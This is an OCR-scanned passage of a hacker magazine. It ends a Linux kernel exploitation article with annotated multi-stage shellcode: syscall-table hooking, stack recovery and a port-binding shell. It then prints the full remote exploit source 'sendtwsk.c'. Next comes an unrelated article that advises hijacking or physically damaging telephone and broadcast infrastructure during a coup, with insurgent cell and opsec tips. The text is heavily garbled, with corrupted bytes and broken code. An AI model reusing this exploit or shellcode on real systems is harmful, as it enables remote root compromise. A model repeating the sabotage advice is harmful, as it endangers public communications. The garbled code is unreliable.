unsigned long flags; /* low level flags */ 

unsigned long status; /* thread-synchronous 
flags */ 

_u32 cpu; /* current CPU */ 

int preempt_count; /* 0 => preemptable, <0 => 
BUG */ 

mm_segment_t addr_limit; /* thread address space: 


O-OxBFFFFFFF for 
user-thead 

O-OxFFFFFFFF for 
kernel-thread 


Be 
ores 
Rap > 
Let’s see how we get to it 
- locate the thread_struct 
"\x89\xe0" // mov %esp, eax 
"\x25\x00\xe0\xff\xff" // and SOxffffe000, teax 


—- scan the thread_struct to locate the addr_limit value. This value is a 
good fingerprint, since it is O0xc0000000 for an userland process and 
Oxffffffff for a kernel thread (or the idle task). [note that this kind 
of scan can be used to figure out in which kind of process we are, 
something that could be very important in some scenario] 


/* scan: */ 


"\x83\xc0\x04" // add S$0x4,%eax 
"\x8b\x18" // mov (%eax), ebx 

W\x.8 3 \xtlb Nxt £" // cmp SOxffffffff, Sebx 
"\x74\x0a" // je 804851le <end> 
"\x81\xfb\x00\x00\x00\xc0O" // cmp $0xc0000000, %ebx 
"\x74\x02" // je 804851le <end> 
"\xeb\xec" // jmp 804850a <scan> 


decrement the ’preempt_count’ value [which is just the member above the 
addr_limit one] 


/* end: */ 
"\xff\x48\xfc" // decl Oxftffffffc (%eax) 


To improve further the shellcode it would be a good idea to perform a test 
over the preempt_count value, so that we would not end up into lowering it 
below zero. 


---[ 3.2.4 - Copying the Stub 
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We have just finished presenting a generic method to restore the stack 
after a ’general mess-up’ of the netfilter core call-frames. 


What we have to do now is to find some place to store our shellcode, since 


we can’t (as we said before) directly execute from inside interrupt 


context. [remember the note, this step and the following one ar xecuted 


before getting out from the softirq context]. 


Since we don’t know almost anything about the remote kernel image memory 


mapping we need to find a ’safe place’ to store the shellcode, that is, 


need to locate some memory region that we can for sure reference and that 


won’t create problems (read : Oops) if overwritten. 


There are two places where we can copy our ’stage-2’ shellcod 


- IDT (Interrupt Descriptor Table) : we can easily get the IDT logical 


address at runtime (as we saw previously in the NULL dereference 
example) and Linux uses only the 0x80 software interrupt vector 


exeption 
entries 


hw interrupt 


entries 
ntry #32 ==+ 
soft interrupt 
entries usable gap 
int 0x80 entry #128 


<- offset limit 


Between entry #32 and entry #128 we have all unused descriptor 
entries, each 8 bytes long. Linux nowadays doesn’t map that memory 
area as read-only [as it should be], so we can write on it [*]. 
We have thus : (128 - 32) * 8 = 98 * 8 = 784 bytes, which is enough 
for our ’stage-2 shellcode’. 


[*] starting with the Linux kernel 2.6.20 it is possible to map some 
areas as read-only [the idt is just one of those]. Since we don’t 
‘start’ writing into the IDT area and executing from there, it is 


possible to bypass that protection simply modifying directly 
kernel page tables protection in /’/previous stages’ of the 
shellcode. 


the current kernel stack : we need to make a little assumption here, 


that is being inside a process that would last for some time (until 


we’ll be able to redirect kernel code over our shellcode, as we will 


see in the next section). 
Usually the stack doesn’t grow up to 4kb, so we have an almost free 
4kb page for us (given that the remote system is using an 8kb stack 


space). To be safe, we can leave some pad space before the shellcod 
We need to take care of the ’struct thread_struct’ saved at the 
‘bottom’ of the kernel stack (and that logically we don’t want to 
overwrite ;) ) 


thread_struct 


usable gap 


[ normally the stack doesn’t ] 
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[ grow over 4kb ] 


| 
| 
ringO stack | 


Alltogether we have : (8192 - 4096) - sizeof(descriptor) - pad ~= 2048 
bytes, which is even more than before. 

With a more complex shellcode we can traverse the process table and 
look forward for a '’safe process’ (init, some kernel thread, some main 
server process). 


Let’s give a look to the shellcode performing that task 


— get the stack address where we are [the uber-famous call/pop trick] 


"\xe8\x00\x00\x00\x00" // call 51 <search+0x29> 
"\ x59" // pop SeCX 


—- scan the stack untill we find the ’start marker’ of our stage-2 stub. 
We put a \xaa byte at the start of it, and it’s the only one present in 
the shellcode. The addl $10 is there just to start scanning after the 
‘cmp SOxaa, %al’, which would otherwise give a false positive for \xaa. 


"\x83\xcl1\x10" // addl $10, %ecx 

"\x41" // ince SECX 

"\x8a\x01" // mov (%ecx), al 
"\x3c\xaa" // cmp SOxaa, al 
"\x75\x£9" // 4 jne 52 <search+0x2a> 


—- we have found the start of the shellcode, let’s copy it in the ’safe 
place’ untill the ’end marker’ (\xbb). The '’safe place’ here is saved 
inside the %Sesi register. We haven’t shown how we calculated it because 
it directly derives from the shellcode used in the next section (it’s 
simply somwhere in the stack space). This code could be optimized by 
saving the ’stage-2’ stub size in %ecx and using rep/repnz in 
conjuction with mov instructions. 


"\x41" // inc SECX 

"\x8a\x01" // mov (%ecx), al 
"\x88\x06" // mov Sal, (esi) 
"\x46" // inc Sesi 

"\x41" // ince SeECX 
"\x80\x39\xbb" // ~ cmpb SOxbb, (%ecx) 

W\ x75 \xr5" // 4 jne 5a <search+0x32> 


[during the develop phase of the exploit we have changed a couple of 
times the ’stage-2’ part, that’s why we left that kind of copy 
operation, even if it’s less elegant :) ] 


---[ 3.2.5 - Executing Code in Userspace Context [Gimme Life! ] 


Okay, we have a ’safe place’, all we need now is a ’safe moment’, that is 
a process context to execute in. The first ’easy’ solution that could come 
to your mind could be overwriting the #128 software interrupt [int $0x80], 
so that it points to our code. The first process issuing a system call 
would thus become our /’/victim process-context’. 

This approach has, thou, two major drawbacks 


-— we have no way to intercept processes using sysenter to access kernel 
space (what if all were using it ? It would be a pretty odd way to 
fad enc) 


— we can’t control which process is ’hooked’ and that might be 
‘disastrous’ if the process is the init one or a critical one, 
Since we’ll borrow its userspace to execute our shellcode (a bindshell 
or a connect-back is not a short-lasting process). 
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We have to go a little more deeper inside the kernel to achieve a good 
hooking. Our choice was to use the syscall table and to redirect a system 
call which has an high degree of possibility to be called and that we’re 
almost sure that isn’t used inside init or any critical process. 

Our choice, after a couple of tests, was to hook the rt_sigaction syscall, 
but it’s not the only one. It just worked pretty well for us. 


To locate correctly in memory the syscall table we use the stub of code 
that sd and devik presented in their phrack paper [23] about /dev/kmem 
patching: 


we get the current stack address, calculate the start of the 
thread_struct and we add 0x1000 (pad gap) [simbolic value far enough 
from both the end of the thread_struct and the top of stack]. Here is 
where we set that %Sesi value that we have presented as /magically 
already there’ in the shellcode-part discussed before. 


"\x89\xe6" // mov sesp, esi 
"\x81\xe6\x00\xe0\xff\xffi" // and SOxffffe000, esi 
"\x81\xc6\x00\x10\x00\x00" // add $0x1000, %esi 


- sd & devik sligthly re-adapted cod 


"\x0£\x01\x0e" //  sidtl (Sesi) 
"\x8b\x7e\x02" // mov 0x2 (esi) ,%edi 
"\x81\xc7\x00\x04\x00\x00" // add $0x400, edi 
"\x66\x8b\x5£\x06" // mov 0x6 (Sedi) , bx 
"\xcl\xe3\x10" // shi $0x10, %ebx 
"\x66\x8b\xlf£" // mov (sedi), bx 

"\ x43" // ine Sebx 
"\x8a\x03" // mov (%ebx), al 
"\x3c\xff" // cmp SOxff, sal 
"\x75\xf9" // 4 jne 28 <search> 
"\x8a\x43\x01" // mov Oxl (Sebx) , al 
"\x3c\x14" // cmp $0x14,%al 
"\x75\xt2" // 4 jne 28 <search> 
"\x8a\x43\x02" // mov 0x2 (Sebx) , al 
"\x3c\x85" // cmp $0x85,%al 
"\x75\xeb" // 4 jne 28 <search> 
"\x8b\x5b\x03" // mov 0x3 (%ebx) , sebx 


— logically we need to save the original address of the syscall somewhere, 
and we decided to put it just before the ’stage-2’ shellcod 


"\x81\xc3\xb8\x02\x00\x00" // add 0x2b8, %ebx 
"\x89\x5e\xf8" // movl %ebx, OxfffffFFF8 (Sesi) 
"\x8b\x13" // mov (%ebx) , edx 
"\x89\x56\xfc" // mov sedx, Oxfffffffc(sesi) 
"\x89\x33" // mov Sesi, (%ebx) 


As you see, we save the address of the rt_sigaction entry [offset 0x2b8] 
inside syscall table (we will need it at restore time, so that we won’t 
have to calculate it again) and the original address of the function 
itself (the above counterpart in the restoring phase). We make point the 
rt_sigaction entry to our shellcode : %esi. Now it should b ven clearer 
why, in the previous section, we had ’’magically’’ the destination address 
to copy our stub into in %esi. 


The first process issuing a rt_Sigaction call will just give life to the 
stage-2 shellcode, which is the final step before getting the connect-—back 
or the bindshell executed. [or whatever shellcode you like more ;) ] 

We’re still in kerneland, while our final goal is to execute an userland 
shellcode, so we still have to perform a bounch of operations. 


There are basically two methods (not the only two, but probably the easier 
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and most effective ones) to achieve our goal 


—- find saved EIP, temporary disable WP control register flag, copy 
the userland shellcode overthere and re-enable WP flag [it could be 
potentially dangerous on SMP]. If the syscall is called through 
sysenter, the saved EIP points into vsyscall table, so we must ’scan’ 
the stack ’untill ret’ (not much different from what we do in the 
stack frame recovery step, just easier here), to get the real 
userspace saved EIP after vsyscall ’/’return’ : 


Oxffffe410 <__kernel_vsyscallt+16>: pop sebp 
Oxffffe411 <__kernel_vsyscall+17>: pop Sedx 
Oxffffe412 <__kernel_vsyscallt+18>: pop SOCK 
Oxffffe413 <__kernel_vsyscall+19>: ret 


As you can see, the first executed userspace address (writable) is at 
saved *(ESP + 12). 


-— find saved ESP or use syscall saved parameters pointing to an userspace 
buffer, copy the shellcode in that memory location and overwrite the 
saved EIP with saved ESP (or userland buffer address) 


The second method is preferable (easier and safer), but if we’re dealing 
with an architecture supporting the NX-bit or with a software patch that 
mulates th xecute bit (to mark the stack and eventually the heap as 
non-executable), we have to fallback to the first, more intrusive, method, 
or our userland process will just segfault while attempting to execute the 
shellcode. Since we do have full control of the process-related kernel 
data we can also copy the shellcode in a given place and modify page 
protection. [not different from the idea proposed above for IDT read-only 
in the ’Copy the Stub’ section 


Once again, let’s go on with the dirty details 


- the usual call/pop trick to get the address we’r xecuting from 


"\xe8\x00\x00\x00\x00" // call 8 <funct0x8> 
"\x59" // pop SeCx 


—- patch back the syscall table with the original rt_sigaction address 
[if those Oxff8 and Oxffc have no meaning for you, just remember that we 
added 0x1000 to the thread_struct stack address to calculate our 'safe 
place’ and that we stored just before both the syscall table entry 
address of rt_sigaction and the function address itself] 


"\x81\xel\x00\xe0\xff\xff" // and SOxffffe000, tecx 
"\x8b\x99\xf8\x0£\x00\x00" // mov Oxff8 (%ecx) , ebx 
"\x8b\x81\xfc\x0£\x00\x00" // mov Oxffc(%ecx) , eax 
"\x89\x03" // mov Seax, (S%ebx) 


-— locate Userland ESP and overwrite Userland EIP with it [method 2] 


"\x8b\x74\x24\x38" // mov 0x38 (Sesp) ,%esi 
"\x89\x74\x24\x2c" // mov $esi,0x2c (%esp) 
WX SIN xe0™ // xor Seax, eax 


— once again we use a marker (\x22) to locate the shellcode we want to 
copy on process stack. Let’s call it ’stage-3’ shellcod 
We use just another simple trick here to locate the marker and avoid a 
false positive : instead of jumping after (as we did for the \xaa one) 
we set the ’ (marker value) - 1’ in %al and then increment it. 
The copy is exactly the same (with the same ’note’) we saw before 


"\xb0O\x21" // mov S$0x21,%al 
"\x40" // inc Seax 
"\x41" // ine SeECX 
"\x38\x01" // cmp Sal, (%ecx) 


"\x75\xfb" //  Jjne 2a <funct+0x2a> 
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WAS Alu 
"\x8a\x19" 
"\x88\xle" 
WASoAay 
"\x46" 
"\x38\x01" 
"\x75\xf6" 


// ine Secx 

// mov (Secx) , Sb1 

// mov Sb1, (Sesi) 

// ine S$ecx 

// ine Sesi 

// cmp Sal, (Secx) 

// 4 jne 30 <func+0x30> 


—- return from the syscall and let the process cleanly exit to userspace. 
Control will be transfered to our modified EIP and shellcode will be 


executed 


"\xe3n 


// ret 


We have used a ’fixed’ value to locate userland ESP/EIP, which worked well 
for the ’standard’ kernels/apps we tested it on (getting to the syscall via 


int $0x80). With a little 


more effort (worth the time) you can avoid those 


offset assumptions by implementing a code similar to the one for the Stack 


Frame Recovery tecniqu 


Just take a look to how current userland EIP,ESP,CS and SS are saved 
before jumping at kernel level 


ringO stack: 


ESP <--- saved ESP 


EIP <--- saved EIP 


All ‘’unpatched’ kernels will have the same value for SS and CS and we can 


use it as a fingerprint to 
below PAGE OFFSET [*]) 


[*] As we already said, on 


locate ESP and EIP (that we can test to be 


latest kernels there could be a different 


uspace/kspace split address than 0xc0000000 [2G/2G or 1G/3G 


configurations] 


We won’t show here the ’stage-3’ shellcode since it is a standard 


‘userland’ bindshell one. 
environment. 


Just use the one you need depending on the 


SSS [PhS 026 The Code : sendtwsk.c 


< stuff/expl/sendtwsk.c > 


include <sys/socket.h> 
include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 
include <string.h> 
include <netinet/ip.h> 
include <netinet/udp.h> 


/* from vuln module */ 
#define MAX _TWSKCHUNK 30 
/* end */ 


define NOP 0x90 


define OVERFLOW_NEED 20 


define JUMP "\xe9\x07\xfe\xf£f\xffi" 
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define SIZE _JMP 


(siz 


_PACKET_LEN 
D) + SIZE_JMP 


define TWSK 
OVERF LOW_NEE 


define TWSK_PROTO 37 


define DEFAULT_VSYSCALL_R 


eof (JMP) 


\ 


define DEFAULT_VSYSCALL 


/* 


* find the correct value 
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-1) 


+ sizeof (struct twsk) 


ET Oxffffe413 
JMP 0xc01403c0 


(((MAX_TWSKCHUNK * sizeof (struct twsk_chunk) ) 


alpha: /usr/src/linux/debug/article/remote/figaro/ip_figaro# 
val: 2147483680, 80000020 result: 512 
val: 2147483681, 80000021 result: 528 
*/ 
#define NEGATIVE _CHUNK_NUM 0x80000020 
char shellcode[]= 
/* hook sys_rtsigaction() and copy the 2level shellcode (72) */ 
"\x90\x90" // nop; nop; [alignment] 
"\x89\xe6" // mov Sesp, esi 
"\x81\xe6\x00\xe0\xff£\xff" // and SOxffffe000, esi 
"\x81\xc6\x00\x10\x00\x00" // add $0x1000, %esi 
"\xO0f\x01\x0e" // sidtl (%esi) 
"\x8b\x7e\x02" // mov Ox2 (esi), %edi 
"\x81\xc7\x00\x04\x00\x00" // add $0x400, edi 
"\x66\x8b\x5£\x06" // mov 0x6 (Sedi) , bx 
"\xcl\xe3\x10" // shl $0x10, %ebx 
"\x66\x8b\xl£" // mov (sedi), bx 
"\ x43" // ine Sebx 
"\x8a\x03" // mov (%ebx), al 
"\x3c\xff" // cmp SOxff,%al 
"\x75\xf9" // 4 jne 28 <search> 
"\x8a\x43\x01" // mov Oxl (Sebx) , Sal 
"\x3c\x14" // cmp $0x14,%al 
"\x75\xf2" // 4 jne 28 <search> 
"\x8a\x43\x02" // mov Ox2 (%ebx), al 
"\x3c\x85" // cmp $0x85,%al 
"\x75\xeb" // 4 jne 28 <search> 
"\x8b\x5b\x03" // mov 0x3 (%ebx), %ebx [get 
sys_call_table] 
"\x81\xc3\xb8\x02\x00\x00" // add 0x2b8, %ebx [get 
sys_rt_sigaction offset] 
"\x89\x5e\xf8" // movl %ebx, OxfffffFfFF8 (Sesi) 
sys_rt_sigaction] 
"\x8b\x13" // mov (%ebx) , sedx 
"\x89\x56\xfc" // mov sedx, Oxfffffffc(%esi) 
"\x89\x33" // mov sesi, (%ebx) [make 
sys_rt_sigaction point to our shellcode 
"\xe8\x00\x00\x00\x00" // call 51 <search+0x29> 
"\ x59" // pop SeCcx 
"\x83\xcl1\x10" // addl $10, %ecx 
"\x41" // inc SECK 
"\x8a\x01" // mov (%ecx), al 
"\x3c\xaa" // cmp SOxaa, al 
"\x75\xf9" // 4 jne 52 <search+0x2a> 
"\x41" // ine SECK 
"\x8a\x01" // mov (Secx) ,%al 
"\x88\x06" // mov Sal, (esi) 
"\x46" // ince sesi 


+ sizeof(struct iphdr) ) 


./roll 


+ 
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"\x41" 
"\x80\x39\xbb" 
"\x75\xf5" 
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/* find and decrement preempt 
"\x89\xe0" 
"\x25\x00\xe0\xff£f\xffi" 
"\x83\xc0\x04" 

"\x8b\x18" 

"\x83\xfb\xff" 

"\x74\x0a" 
"\x81\xfb\x00\x00\x00\xc0O" 
"\x74\x02" 

"\xeb\xec" 

"\xff\x48\xfc" 


/* stack fram 


recovery step 


"\x58" 
"\x83\x3c\x24 
"\x75\xf9" 
"\x83\x7c\x24 
"\x75\x£2" 
"\x83\x7c\x24 
"\x75\xeb" 
"\x8d\x64\x24 


\x02" 
\x04\x01" 
\x10\x00" 


\xfc" 


"\x8b\x04\x24" 
"\x89\xc3" 
"\x03\x43\xfc" 

"\ x40" 

"\x8a\x18" 
"\x80\xfb\xc3" 
"\x75\xf8" 
"\x80\x78\xf£\x88" 
"\x74\xf2" 
"\x80\x78\xf£\x8o" 
"\x74\xec" 
"\x31\xc9" 

"\x4g" 

"\x8a\x18" 
"\x80\xe3\xf0" 
"\x80\xfb\x50" 
"\x75\x03" 

"\x41" 

"\xeb\x£2" 

"\x40" 

"\x89\xc6" 
"\x31\xc0" 
"\xb0\x04" 
"\xf7\xel" 
"\x29\xc4" 
"\x31\xc0" 
"\xff\xeo6" 


/* end of stack frame recovery */ 


/* stage-2 shellcode */ 
"\xaa" 
"\ xe8\x00\x00\x00\x00" 
M\ x59" 


"\x81\xel\x00\xe0\xff\xff" 
"\x8b\x99\xf8\x0£\x00\x00" 
"\x8b\x81\xfc\x0£\x00\x00" 
"\x89\x03" 
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// ine secx 
//  cmpb SOxbb, (Secx) 
//  jne 5a <search+0x32> 
counter (32) */ 
// mov %esp, eax 
// and SOxfff£fe000, eax 
// add $0x4,%eax 
// mov (%eax), %ebx 
// cmp SOxffffffEE, sebx 
// je 80485le <end> 
// cmp $0xc0000000, Sebx 
// je 80485le <end> 
// jmp 804850a <scan> 
// decl Oxfffffffc(%eax) 
a 
// pop seax 
// cmp $0x2, (%esp) 
// 4 jne 8048330 <do_unroll> 
// cmp SOx1, 0x4 (%esp) 
// 4 ne 8048330 <do_unroll> 
// cmp $0x0,0x10 (%esp) 
// 4 jne 8048330 <do_unroll> 
// lea Oxfffffffc(Sesp), esp 
// mov (Sesp) , eax 
// mov seax, sebx 
if: “aaa Oxfffffffc (Sebx) , eax 
// ine seax 
// mov (eax), Zbl 
// cmp $0xc3,%bl 
// 4 jne 8048351 <do_unroll+0x21> 
// cmpb  $0x88,0xffffffft (%eax) 
// je 8048351 <do_unroll+0x21> 
// cmpb $0x89,0xfffffffFt (%eax) 
// je 8048351 <do_unroll+0x21> 
// xor Secx, $ecx 
// dec seax 
// mov (eax), Zbl 
// and SOxf0, %bl 
// cmp $0x50,%bl1 
// 4 jne 8048375 <do_unrollt+0x45> 
// ine secx 
// jmp 8048367 <do_unroll+0x37> 
// ine seax 
// mov Seax, esi 
// xor Seax, eax 
// mov $0x4,%al 
// mul secx 
// sub Seax, %esp 
// xor S$eax, eax 
// jmp *Sesi 
// border stage-2 start 
// call 8 <funct0x8> 
// pop secx 
// and SOxffffe000, tecx 
// mov Oxff£8 (Secx) , ebx 
// mov Oxffc(%ecx) , eax 
// mov Seax, (Sebx) 
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"\x8b\x74\x24\x38" // mov 0x38 (Sesp) ,%esi 
"\x89\x74\x24\x2c" // mov $esi,0x2c(%esp) 
"\x31\xc0" // xor Seax, eax 
"\xb0\x21" // mov $0x21,%al 
"\x40" // inc Seax 

"\x41" // ince SeECX 
"\x38\x01" // cmp Sal, (Secx) 
"\x75\xfb" //  jne 2a <funct+0Ox2a> 
"\x41" // ince SeECX 
"\x8a\x1l9" // mov (Secx) , Sb1 
"\x88\xle" // mov Sb1, (%esi) 

Wr gy // inc SECK 

"\x46" // inc sesi 
"\x38\x01" // cmp Sal, (%ecx) 
"\x75\xf6" // 4 jne 30 <func+0x30> 
WA sG3" // ret 

"\x22" // border stage-3 start 
"\x31\xdb" // xor ebx, ebx 
"\xf7\xe3" // mul ebx 
"\xb0\x66" // mov al, 102 
"\x53" // push ebx 

"\ x43" // ince ebx 

"\x53" // push ebx 

"\ x43" // ince ebx 

WV 53" // push ebx 
"\x89\xel" // mov ecx, esp 
"\x4b" // dec ebx 
"\xcd\x80" // int 80h 
"\x89\xc7" // mov edi, eax 

Wx 52m // push edx 
"\x66\x68\x4e\x20" // push word 8270 

"\ x43" AY FRING: ebx 
"\x66\x53" // push bx 
"\x89\xel" // mov ecx, esp 
"\xb0\xef" // mov al, 239 
"\xf6\xd0" // not al 

"\x50" // push eax 

"\x51" // push eCcx 

WN S itt // push edi 
"\x89\xel" // mov ecx, esp 
"\xb0\x66" // mov al, 102 
"\xcd\x80" // int 80h 
"\xb0\x66" // mov al, 102 

"\ x43" hf ine ebx 

"\ x43" // inc ebx 
"\xcd\x80" // int 80h 

"\x50" // push eax 

"\x50" // push eax 

"\x57" // push edi 
"\x89\xel" // mov ecx, esp 

Wx 4 3" // ince ebx 
"\xb0\x66" // mov al, 102 
"\xcd\x80" // int 80h 
"\x89\xd9" // mov ecx, ebx 
"\x89\xc3" // mov ebx, eax 
"\xbO\x3f" // mov al, 63 
"\x49" // dec eCx 
"\xcd\x80" // int 80h 

"\x41" // ine ecx 
"\xe2\xf8" // loop lp 

"\x51" // push eCcx 
"\x68\x6e\x2£\x73\x68" // push dword 68732f6eh 
"\x68\x2£\x2£\x62\x69" // push dword 69622f2fh 
"\x89\xe3" // mov ebx, esp 
"\x51" // push ecx 


"\x53" // push ebx 
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"\x89\xel" // mov ecx, esp 
"\xbO\xf4" // mov al, 244 
"\xf6\xdo" // not al 
"\xcd\x80" Pk nk 80h 

WNK22" // border stage-3 end 
"\xbb"; // border stage-2 end 


/* end of shellcode */ 


struct twsk_chunk 
{ 

int type; 

char buff[12]; 
}; 


struct twsk 
{ 

int chunk_num; 

struct twsk_chunk chunk[0]; 
}; 


void fatal_perror(const char *issue) 
{ 

perror ("issue"); 

exit (1); 
} 


void fatal(const char *issue) 
{ 

perror ("issue"); 

exit(l1); 
} 


/* packet IP cheksum */ 
unsigned short csum(unsigned short *buf, int nwords) 
{ 

unsigned long sum; 

for(sum=0; nwords>0; nwords--) 

sum += *buf++; 

sum = (sum >> 16) + (sum &Oxffff); 

sum += (sum >> 16); 

return ~sum; 


void prepare_packet (char *buffer) 

{ 
unsigned char *ptr = (unsigned char *)buffer;; 
unsigned int i; 
unsigned int left; 


left = TWSK_PACKET_LEN - sizeof(struct twsk) - sizeof(struct iphdr); 
left -= SIZE_JMP; 

left -= sizeof (shellcode)-1; 

ptr += (sizeof (struct twsk)+sizeof(struct iphdr)); 


memset (ptr, 0x00, TWSK_PACKET_LEN) ; 


memcpy (ptr, shellcode, sizeof (shellcode)-1); /* shellcode must be 4 


bytes aligned */ 


ptr += sizeof (shellcode)-1; 
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for(i=l; i < left/4; it+, 
*((unsigned int *)pt 


*((unsigned int *)ptr) =D 
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ptr+=4) 
r) = DEFAULT_VSYSCALL_RET; 


EFAULT_VSYSCALL_JMP; 


ptrt+=4; 


ptr=sp\n", buffer, 
/* jmp -500 */ 


printf ("buffer=%p, 
strcpy (ptr, JUMP); 


ptr); 


int main(int argc, 


{ 


char *argv[]) 


int sock; 
struct sockaddr_in sin; 
int one = 1; 


const int *val = é&one; 
printf ("shellcode size: %d\n", sizeof (shellcode) 
char *buffer = malloc (TWSK_PACKET_LEN) ; 
if (!buffer) 
fatal_perror ("malloc"); 
prepare_packet (buffer); 
struct iphdr *ip = (struct iphdr *) buffer; 


struct twsk *twsk = 
iphdr) ); 


(struct twsk *) 


if(arge < 2) 

{ 
printf ("Usage: 
exit (-1); 


./sendtwsk ip"); 


sock = socket (AF_INET, 
if (sock < 0) 
fatal_perror ("socket"); 


SOCK_RAW, 


sin.sin_family = AF_INET; 

sin.sin_port = htons (12345); 
sin.sin_addr.s_addr = inet_addr(argv[1]); 
/* ip packet */ 

ip->ihl = 5; 

ip->version = 4; 

ip->tos = 16; 

ip->tot_len = TWSK_PACKET_LEN; 

ip->id = htons (12345); 

ip->ttl = 64; 

ip->protocol = TWSK_PROTO; 

ip->saddr = inet_addr("192.168.200.1"); 
ip->daddr = inet_addr(argv[1]); 


twsk->chunk_num 


= NEGATIVE _CHUNK_NUM,; 
ip->check = csum((unsigned short *) 


buffer, 


if (setsockopt (sock, IPPROTO_IP, 
fatal_perror("setsockopt"); 


IP_HDRINCL, 


if (sendto(sock, buffer, 
sizeof(sin)) < 0) 
fatal_perror("sendto"); 


ip->tot_len, 0, 


return 0; 


IPPROTO_RAW) ; 


TWSK_PACKET_LE 


val, 


1); 


(buffer + sizeof (struct 


sizeof(o 


(struct sockaddr *) 


&Ssin, 
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So2225 [ 4 -— Final words 


With the remote exploiting discussion ends that paper. We have presented 
different scenarios and different exploiting tecniques and ’notes’ that we 
hope you’ll find somehow useful. This paper was a sort of sum up of the 
more general approaches we took in those years of ’kernel exploiting’. 


As we said at the start of the paper, the kernel is a big and large beast, 
which offers many different points of ’attack’ and which has more severe 
constraints than the userland exploiting. It is also ’relative new’ and 
improvements (and new logical or not bugs) are getting out. 

At the same time new countermeasures come out to make our ‘exploiting 
life’ harder and harder. 


The first draft of this paper was done some months ago, so we apologies if 
some of the information here present could be outdated (or already 
presented somewher lse and not properly referenced). We’ve tried to add 
a couple of comments around the text to point out the most important 
recent changes. 


So, this is the end, time remains just for some greets. Thank you for 
reading so far, we hope you enjoyed the whole work. 


A last minute shotout goes to bitsec guys, who performed a cool talk 
about kernel exploiting at BlackHat conference [24]. Go check their 
paper/exploits for examples and covering of *BSD and Windows systems. 


Greetz and thanks go, in random order, to 


sgrakkyu: darklady(:*), HTB, risk (Arxlab), recidjvo (for netfilter 
tricks), vecna (for being vecna:)). 


twiz: lmbdwr, ga, sd, karl, cmn, christer, koba, smaster, #dnerds & 
#elfdev people for discussions, corrections, feedbacks and just long 
‘evening/late night’ talks. 

A last shotout to akira, sanka, metal_militia and yhly for making the 
monday evening a _great_ evening [and for all the beers offered :-) ]. 
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The Revolution will be on YouTube 
By Gladio 


Gladio@phrack.org 


Forget everything you know about revolutions. It’s all wrong. 


Fighting a conventional war in an industrialized nation is suicide. Even 
if you could field a military force capable of defeating the government 
forces, the wreckage wouldn’t be worth having. Think about mortar shells 
landing in chemical plants. Massive toxic waste spills. Poisonous clouds 
drifting with the winds. Fighting a war in your own backyard is just 
plain stupid. Notice how the super-powers fight each other with proxy 
wars in other countries. 


Sure it might be fun to form a militia and go play army with your friends 
in Idaho. Got some full-auto assault rifles? Maybe even mortars, heavy 
machine guns and some anti-aircraft guns? 


Think they can take out an AC-130 lobbing artillery shells from 12 miles 

away? A flight of A-10s spitting depleted uranium shells the size of your 
£ 
s 


ist at a rate that makes the cannon sound like a redlined dirt bike? A 
hooting war with a modern government is a shortcut to obliteration. 


Most coups are accomplished (or thwarted) by skillful manipulation of 
information. There have been a number of countries where tyrants (and 
legitimate leaders) have been overthrown by very small groups using mass 
communications effectively. 


[The typical method involves blocking all (or most) information sources 
controlled by the government, and supplying an alternative that delivers 
your message. Usually, you just announce the change in government, tell 
veryone they are safe and impose a curfew for a short time to consolidate 
your control. Announce that the country, the police and the military are 
under your control, and keep repeating it. Saturate the airwaves with your 
message, while preventing any contradictory messages from propagation. 


Virtually all broadcast media use the telephone network to deliver content 
from their studios to their transmitters. Networks use satellites and 
pstn to distribute content to local stations, which then use pstn to 
deliver it to the transmitter site. 


Hijacking these phone connections accomplishes both goals, of denying the 
‘official’ media access, and putting your own message out. 


In cases where you can’t hijack the transmitters, dropping the pstn 

will be effective. Police and military also use pstn to connect dispatch 
centers with transmitter towers. Recently, many have installed wireless 
(microwave) fallback systems. 


Physically shutting down the pstn just prior to your broadcasts may be 
very effective. This is most easily accomplished by physical damage to 

the telco facilities, but there are also non-physical technical means to 
do this on a broad scale. Spelling them out here would only result in the 
holes being closed, but if you have people with the skill set to do this, 
it is preferable to physical means because you will have the advantage 

of utilizing these communications resources as your plan progresses. 


Leveraging the Internet 
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Most of the FUD produced about insurgence and the internet is focused on 
"taking down" the internet. That’s probably not the most effective us 

of technical assets. An insurgency would benefit more from utilizing the 
net. One use is mass communications. Get your message out to the masses 
and recruit new members. 


Another use is for communications within your group. This is where things 
get sticky. Most governments have the ability to monitor and intercept 
their citizen’s internet traffic. The governments most deserving of 
being overthrown are probably also the most effective at electronic 
surveillance. 


The gov will also infiltrate your group, so forums aren’t going to 

be the best means of communicating strategies and tactics. Forums can 
be useful for broad discussions, such as mission statements, goals and 
recruiting. Be wary of traffic analysis and sniffing. TOR can be useful, 
particularly if your server is accessible only on TOR network. 


Encryption is your best friend, but can also be your worst enemy. Keep 
in mind that encryption only buys you time. A good, solid cipher will 
not likely be read in real time by your opponent, but will eventually 
be cracked. The important factor here is that it not be cracked until 
it’s too late to be useful. 


A one time pad (OTP) is the best way to go. Generate random data and 
write it to 2, and only 2, DVDs. Physically transport the DVDs to each 
communications endpoint. Never let them out of your direct control. Do 
not mail them. Do not send keys over ssh or ssl. Physically hand the DVD 
to your counterpart on the other end. Never re-use a portion of the key. 


Below is a good way to utilize your OTP: 


Generate a good OTP (K), come up with a suspicious alternate messag 
(M), and knowing your secret text (P), you calculat (where "+" mod 
26 addition): 


K’ =M+K 
K’’ =P + K 


Lock up K’’ in a safety deposit box, and hide k’ in some other off 

site, secure location. Keep C around with big "beware of Crypto systems" 
signs. When the rubber hose is broken out, take at least 2 good lickings, 
and then give up the key to the safety deposit box. They get K’’, 

and calculate 


thus giving them the bogus message, and protecting your real text. 


Operational Security 


The classic "cellular" configuration is the most secure against 
infiltration and compromise. A typical cell should have no more than 5-10 
members. One leader, 2 members who each know how to contact one member 

of an ‘upstream’ cell, and 2 members who each know how to contact one 
member of a downstream cell. Nobody, including the leader, should know 
how to contact more than one person outside of their own cell. 


Never use your real name, and never use your organizational alias in 
any other context. 


Electronic communications between members should be kept to a 

minimum. When it is necessary, it should only be conducted via the OTP 
cipher. Preferably, these communications should consist of not much more 
than arranging a physical meeting. Meet at a pre-arranged place, and 
then go to another, un-announced place where surveillance is difficult, 
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to discuss operational matters. 


Do not carry a phone. Even a phone which is switched off can be 
tracked, and most can be used to eavesdrop on discussions even when 
powered down. Removing the battery is only marginally safer, because 
tracking/listening gear can be built into the battery pack. If you find 
yourself stuck with a phone during a meeting, remove the battery and 
place both the phone and battery in a metal box and remove it from the 
immediate area of conversation. 


It never hurts to generate some bogus traffic. Gibberish, random data, 
innocuous stories etc., all serve to generate noise in which to better 
